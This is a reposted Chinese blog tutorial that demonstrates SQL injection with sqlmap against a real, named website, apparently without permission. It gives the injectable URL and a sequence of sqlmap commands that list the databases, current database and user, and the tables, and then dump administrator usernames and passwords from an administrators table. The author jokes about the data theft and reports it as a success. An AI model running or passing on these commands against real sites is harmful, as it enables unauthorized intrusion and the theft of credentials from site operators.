转载:sqlmap的应用实战
作者:互联网
原文链接:https://blog.csdn.net/vala0901/article/details/71548954
有幸在kali中文网上查看了很多大神写的sqlmap的教程,其中还在大神的文章里找到了一个悲催的网站www.bible-history.com/,所以就按照前人总结,给这个悲催的网站脱裤了。。。。下面详细的讲一下怎么给网站脱裤,啊,不,是拖库。。。。。
1.首先要知道可以注入的网址是什么
http://www.bible-history.com/subcat.php?id=2
2.接着就可以针对这个网址来检测能不能注入,以及查看它的所有数据库列表了
sqlmap -u "http://www.bible-history.com/subcat.php?id=2" --dbs (注意:dbs前面是两个横杠)
注入的结果表示:
(1)注入参数id为GET注入,注入类型有四种,分别是:boolean-based blind/error-based/time-based blind/union query
(2)web应用程序技术为:Apache PHP
(3)数据库类型:MySQL
(4)画红圈的是网址所有的数据库名单
其中可能有你输入[Y/N]的,统统回车解决吧。
3.这时,我们发现这个网址存在注入,并且拿到了所有数据库名单。我们决定查看web当前使用的数据库
sqlmap -u "http://www.bible-history.com/subcat.php?id=2" --current-db
红线画出的就是当前使用的数据库:bible_history,一会我们会针对这个数据库下手。。。
4.探测web数据库使用的账号
sqlmap -u "http://www.bible-history.com/subcat.php?id=2" --current-user
可见当前的数据库使用账户为:bho@localhost
5.下面我们来探测bible_history这个数据库里的所有表
sqlmap -u "http://www.bible-history.com/subcat.php?id=2" -D bible_history --tables
其中:
(1)D指出数据库名字
(2)tables列出表
6.下面我想探测的是administrators这个表的列
sqlmap -u "http://www.bible-history.com/subcat.php?id=2" -D bible_history -T administrators --columns
其中:
(1)T指定要列出字段的表
(2)columns列出列
7.表中字段明显拿到了。。。。下面一步还用说么?果断脱裤。。。。好开心。。。。
sqlmap -u "http://www.bible-history.com/subcat.php?id=2" -D bible_history -T administrators -C admin_id,admin_username,admin_password --dump
成功!!!
(PS:自从逛了大神技术贴,就再也不能好好说“拖库”了。。。满脑子都是给web脱裤。。。。我天朝的男程序员们就是如此闷骚阔爱)认真脸。。。
标签:sqlmap,实战,www,bible,数据库,转载,id,history 来源: https://blog.csdn.net/sinolzeng/article/details/113800070